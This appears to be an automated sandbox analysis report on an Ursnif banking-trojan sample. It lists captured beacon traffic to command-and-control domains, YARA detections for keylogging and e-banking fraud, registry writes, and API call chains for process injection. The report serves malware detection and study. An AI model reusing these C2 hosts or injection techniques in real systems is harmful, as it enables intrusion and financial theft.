                    Source: global trafficHTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                    Source: global trafficHTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                    Source: Joe Sandbox ViewASN Name: DHUBRU DHUBRU
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 09:05:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                    Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                    Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                    Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmpString found in binary or memory: http://crl.m-
                    Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                    Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                    Source: unknownHTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,21_2_04BC3276

                    System Summary:

                    barindex
                    Writes registry values via WMIShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_6FBB227421_2_6FBB2274
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC7E3021_2_04BC7E30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC725F21_2_04BC725F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC175421_2_04BC1754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E6357021_2_05E63570
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E490A121_2_05E490A1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E45C8821_2_05E45C88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E4FBA921_2_05E4FBA9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E543B921_2_05E543B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E57B5D21_2_05E57B5D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5DAED21_2_05E5DAED
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CBB94832_2_00CBB948
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CBB23032_2_00CBB230
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA70C832_2_00CA70C8
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C990FC32_2_00C990FC
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB88B832_2_00CB88B8
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C9100032_2_00C91000
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA782032_2_00CA7820
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAA9F832_2_00CAA9F8
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA694432_2_00CA6944
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAE95C32_2_00CAE95C
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA415032_2_00CA4150
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA116432_2_00CA1164
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB516432_2_00CB5164
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA012432_2_00CA0124
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C9213832_2_00C92138
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C99AD832_2_00C99AD8
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CABA7432_2_00CABA74
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C9ABDC32_2_00C9ABDC
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB4BA032_2_00CB4BA0
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CBA3A432_2_00CBA3A4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C9134832_2_00C91348
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA834032_2_00CA8340
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB435432_2_00CB4354
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C94B6032_2_00C94B60
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB730C32_2_00CB730C
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAD32832_2_00CAD328
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA448432_2_00CA4484
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C974A432_2_00C974A4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB940832_2_00CB9408
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB340032_2_00CB3400
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB4DE032_2_00CB4DE0
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA1DF432_2_00CA1DF4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA559C32_2_00CA559C
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA5DBC32_2_00CA5DBC
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA950032_2_00CA9500
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA2EC032_2_00CA2EC0
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAC6C432_2_00CAC6C4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB5ED832_2_00CB5ED8
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB2EF832_2_00CB2EF8
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C976F432_2_00C976F4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CA668432_2_00CA6684
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB6EA032_2_00CB6EA0
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB06B432_2_00CB06B4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00C9361032_2_00C93610
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAA79032_2_00CAA790
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAF7B432_2_00CAF7B4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5FEAB CreateProcessAsUserW,21_2_05E5FEAB
                    Source: presentation[2021.09.09_15-26].vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset,21_2_6FBB1382
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,21_2_6FBB14FE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_6FBB1B4A NtMapViewOfSection,21_2_6FBB1B4A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_6FBB2495 NtQueryVirtualMemory,21_2_6FBB2495
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset,21_2_04BC6EB3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,21_2_04BC40DC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC7666 NtMapViewOfSection,21_2_04BC7666
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC8055 NtQueryVirtualMemory,21_2_04BC8055
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,21_2_05E609D7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,21_2_05E5B58C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5A8F7 NtMapViewOfSection,21_2_05E5A8F7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,21_2_05E58890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset,21_2_05E5B878
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,21_2_05E55878
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5F7F5 NtQueryInformationProcess,21_2_05E5F7F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,21_2_05E437F6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,21_2_05E6079B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,21_2_05E5A71C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,21_2_05E56657
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,21_2_05E50E3E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,21_2_05E555D6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,21_2_05E45166
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError,21_2_05E49D36
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,21_2_05E50CEF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,21_2_05E60BAB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E50FBD memset,NtQueryInformationProcess,21_2_05E50FBD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,21_2_05E5FBB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError,21_2_05E4579C
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread,32_2_00CBA8F0
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose,32_2_00CB20A4
                    Source: C:\Windows\System32\control.exeCode function: 32_2_00CAE860 NtQueryInformationProcess,32_2_00CAE860
